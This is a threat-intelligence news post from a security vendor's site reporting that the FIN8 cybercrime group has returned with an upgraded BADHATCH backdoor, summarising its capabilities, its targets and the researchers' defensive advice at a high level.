company logo

Product

Our Product

We are Reshaping the way Developers find and fix vulnerabilities before they get exploited.

Solutions

By Industry

BFSI

Healthcare

Education

IT & Telecom

Government

By Role

CISO/CTO

DevOps Engineer

Resources

Resource Library

Get actionable insight straight from our threat Intel lab to keep you informed about the ever-changing Threat landscape.

Subscribe to Our Weekly Threat Digest

Company

Contact Us

Have queries, feedback or prospects? Get in touch and we shall be with you shortly.

loading..
loading..
loading..
Loading...

FIN8

loading..
loading..
loading..

FIN8 group comeback with Improved BADHATCH Kit

FIN8 is armed with a powerful version of a backdoor with better capabilities such as screen capturing, proxy tunneling, theft of sensitive credentials, and fil...

12-Mar-2021
3 min read

 

FIN8, a financially motivated hacker is back in action after about 18 months hiatus, and this time he is armed with a powerful version of a backdoor with better capabilities such as screen capturing, proxy tunneling, theft of sensitive credentials, and fileless execution.

It was first documented in 2016 by FireEye and is mostly known for its planned attacks against hospitality, retail, and entertainment industries apart from using a wide array of tricks such as spear phishing and malicious tools like PUNCHTRACK and BADHATCH for pilferage of payment card data from point-of-sale (POS) systems.

"The FIN8 group is known for taking long breaks to improve TTPs and increase their rate of success," Bitdefender researchers said in a report published today. "The BADHATCH malware is a mature, highly advanced backdoor that uses several evasion and defense techniques. The new backdoor also attempts to evade security monitoring by using TLS encryption to conceal Powershell commands."

Ever since BADHATCH was discovered in 2019, it has been deployed as an implant that could run hacker-supplied commands obtained from a remote server, other than injecting rouge DLLS in a current process, collecting various system information, and then exfiltrating data to the server. According to the researcher, the latest version of BADHATCH exploits an authorized service named sslp.io to evade detection during the process of deployment, while using it to download a PowerShell script that executes the shellcode having the BADHATCH DLL.

The PowerShell script not only takes responsibility for achieving persistence but also takes care of privilege escalation in order to confirm that all commands post the script’s execution are operated as the SYSTEM user.

FIN8’s second evasion trick involves passing off communications with the command-and-control(C2) server that mask itself as authorized HTTP requests. This latest wave of cyberattacks is said to have taken place over the last year and is directed against retail, technology, insurance, and chemical industries in the U.S., Canada, South Africa, Puerto Rico, and other countries.

"Like most persistent and skilled cyber-crime actors, FIN8 operators are constantly refining their tools and tactics to avoid detection," the researchers said while insisting businesses "separate the POS network from the ones used by employees or guests" and filter out emails having malicious or suspicious attachments.